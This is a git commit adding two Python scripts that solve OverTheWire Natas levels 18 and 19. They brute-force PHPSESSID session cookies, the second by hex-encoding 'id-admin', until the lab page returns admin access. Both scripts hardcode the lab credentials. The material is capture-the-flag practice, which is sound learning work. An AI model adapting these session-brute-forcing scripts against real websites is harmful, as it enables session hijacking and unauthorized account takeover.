web exploit

2025-05-02 14:56:10 -04:00 · 2014-11-19 15:55:54 -05:00 · 2014-11-19 15:55:54 -05:00 · 662953c17a
commit 662953c17a
parent a0c026ca27
17 changed files with 201 additions and 119 deletions
--- a/Web_Security/user_id/sqli_19_cookie_auth.py
+++ b/Web_Security/user_id/sqli_19_cookie_auth.py
@ -0,0 +1,34 @@
+#!/usr/bin/python
+
+__author__ = "bt3gl"
+__email__ = "bt33gl@gmail.com"
+
+import requests
+
+
+def brute_force_password(AUTH, URL, PAYLOAD, MAXID):
+
+    for i in range(MAXID):
+        HEADER ={'Cookie':'PHPSESSID=' + str(i)}
+        r = requests.post(URL, auth=AUTH, params=PAYLOAD, headers=HEADER)
+        print(i)
+
+        if "You are an admin" in r.text:
+            print(r.text)
+            print(r.url)
+
+
+
+
+if __name__ == '__main__':
+
+    AUTH = ('natas18', 'xvKIqDjy4OPv7wCRgDlmj0pFsCsDjhdP')
+    URL = 'http://natas18.natas.labs.overthewire.org/index.php?'
+
+    PAYLOAD = ({'debug': '1', 'username': 'user', 'password': 'pass'})
+    MAXID = 640
+
+    brute_force_password(AUTH, URL, PAYLOAD, MAXID)
+
+
+
--- a/Web_Security/user_id/sqli_20_user_id_2.py
+++ b/Web_Security/user_id/sqli_20_user_id_2.py
@ -0,0 +1,45 @@
+#!/usr/bin/python
+
+__author__ = "bt3gl"
+__email__ = "bt33gl@gmail.com"
+
+import requests
+
+
+def brute_force_password(AUTH, URL, PAYLOAD, MAXID):
+
+    for i in range(MAXID):
+        HEADER ={'Cookie':'PHPSESSID=' + (str(i) + '-admin').encode('hex')}
+        r = requests.post(URL, auth=AUTH, params=PAYLOAD, headers=HEADER)
+        print(i)
+
+        if "You are an admin" in r.text:
+            print(r.text)
+            print(r.url)
+
+
+if __name__ == '__main__':
+
+    AUTH = ('natas19', '4IwIrekcuZlA9OsjOkoUtwU6lhokCPYs')
+    URL = 'http://natas19.natas.labs.overthewire.org/index.php?'
+
+    PAYLOAD = ({'debug': '1', 'username': 'admin', 'password': 'pass'})
+    MAXID = 640
+
+    brute_force_password(AUTH, URL, PAYLOAD, MAXID)
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+